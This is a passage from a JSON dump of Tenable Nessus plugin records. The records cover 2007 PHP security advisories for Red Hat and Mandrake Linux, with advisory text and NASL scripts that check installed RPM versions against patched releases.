script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0153\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0153\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", 
reference:\"php-common-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", 
reference:\"php-xml-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:09:08", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. A\nremote attacker could cause the PHP interpreter to crash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nThe internal filter module in PHP in certain instances did not\nproperly strip HTML tags, which allowed a remote attacker to conduct\ncross-site scripting (XSS) attacks (CVE-2007-1454).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered. 
If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of Suhosin helped to protect against some of\nthese issues prior to patching.", "modified": "2018-12-05T00:00:00", "published": "2009-04-23T00:00:00", "id": "MANDRAKE_MDKSA-2007-090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=37164", "title": "Mandrake Linux Security Advisory : php (MDKSA-2007:090)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:090. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37164);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/12/05 20:31:23\");\n\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1454\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22914, 23016, 23145, 23357);\n script_xref(name:\"MDKSA\", value:\"2007:090\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2007:090)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. 
A\nremote attacker could cause the PHP interpreter to crash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nThe internal filter module in PHP in certain instances did not\nproperly strip HTML tags, which allowed a remote attacker to conduct\ncross-site scripting (XSS) attacks (CVE-2007-1454).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered. If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of Suhosin helped to protect against some of\nthese issues prior to patching.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandrake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", 
reference:\"libphp5_common5-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-cgi-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-cli-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-devel-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-fcgi-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-filter-5.2.1-0.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-gd-5.2.1-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-mbstring-5.2.1-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-openssl-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-zlib-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:16", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processes\ndata. 
If a remote attacker is able to pass arbitrary data to PHP's\nunserialize() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1286)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker is able to pass arbitrary data to PHP's\nsession_decode() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1711)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-04-19T00:00:00", "id": "REDHAT-RHSA-2007-0154.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25067", "title": "RHEL 2.1 : php (RHSA-2007:0154)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0154. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25067);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1711\");\n script_bugtraq_id(22764, 22765);\n script_xref(name:\"RHSA\", value:\"2007:0154\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2007:0154)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of 
service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processes\ndata. If a remote attacker is able to pass arbitrary data to PHP's\nunserialize() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1286)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker is able to pass arbitrary data to PHP's\nsession_decode() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1711)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0154\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0154\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.17\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
